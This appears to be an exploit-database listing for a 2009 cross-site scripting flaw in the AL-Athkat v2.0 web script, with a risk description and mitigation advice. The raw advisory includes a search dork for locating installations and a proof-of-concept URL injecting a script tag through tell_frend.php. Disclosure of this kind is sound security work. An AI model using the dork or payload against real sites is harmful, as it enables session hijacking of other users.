header-logo
Suggest Exploit
vendor:
AL-Athkat.v2.0
by:
indoushka
7,5
CVSS
HIGH
XSS
79
CWE
Product Name: AL-Athkat.v2.0
Affected Version From: AL-Athkat.v2.0
Affected Version To: AL-Athkat.v2.0
Patch Exists: N/A
Related CWE: N/A
CPE: AL-Athkat.v2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
2009

AL-Athkat.v2.0 Cross Site Scripting Vulnerability

A Cross-Site Scripting (XSS) vulnerability was discovered in AL-Athkat.v2.0. An attacker can exploit this vulnerability to inject malicious JavaScript code into the vulnerable application. This code will be executed in the browser of the victim when the vulnerable page is accessed. The malicious code can access any cookies, session tokens, or other sensitive information retained by the browser and used with the vulnerable application. This may lead to the attacker taking control of the affected user's session.

Mitigation:

Input validation can be used to prevent XSS attacks. All user-supplied input should be validated and filtered for malicious content. Additionally, output encoding should be used to prevent malicious content from being interpreted as code by the browser.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : AL-Athkat.v2.0 Cross Site Scripting Vulnerability                    
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                     
| # Total alerts found : 1                                                
|                High  : 1                                                                       
|              Medium  :                                                                        
|                  Low :                                                                            
|       Informational  :                                                             
| # Web Site : www.iq-ty.com                                                           
                                                                    
| # Dork     : script AL-Athkat.v2.0 ÓßÑíÈÊ ÇáÃÐßÇÑ v2.0                            
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- XSS

http://server/tell_frend.php?name=indoushka&email=indoushka%40hotmaill%2Ecom&name1=tchalla06@yahoo.fr&email1=Hussin-x&submitok=1&link=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>


================================   Dz-Ghost Team   ========================================
Greetz : Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.albasrah-forums.com * www.amman-dj.com * www.forums.ibb7.com * www.maker-sat.com * www.owned-m.com
www.vb.7lanet.com * www.3kalam.com * Stake (v4-team.com) * www.3kalam.com * www.dev-chat.com  
www.al7ra.com * Cyb3r IntRue (avengers team) * www.securityreason.com * www.packetstormsecurity.org
www.sazcart.com * www.best-sec.net * www.app.feeddigest.com * www.forum.brg8.com * www.zone-h.net
www.m-y.cc * www.hacker.ps * no-exploit.com * www.bug-blog.de * www.gem-flash.com * www.soqor.org
www.h4ckf0ru.com * www.bawassil.com * www.host4ll.com * www.hacker-top.com * www.xp10.me 
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com)  
SoldierOfAllah (www.m4r0c-s3curity.cc)www.arhack.net * www.google.com * www.np-alm7bh.com 
www.lyloo59.skyrock.com * www.sec-eviles.com * www.snakespc.com * www.kadmiwe.net * www.syrcafe.com 
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.h-t.cc * www.arabic-m.com * www.74ck3r.com 
r1z (www.sec-r1z.com) * omanroot.com * www.bdr130.net * www.zac003.persiangig.ir * www.0xblackhat.ir
www.mormoroth.net * www.securitywall.org * www.sec-code.com *
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR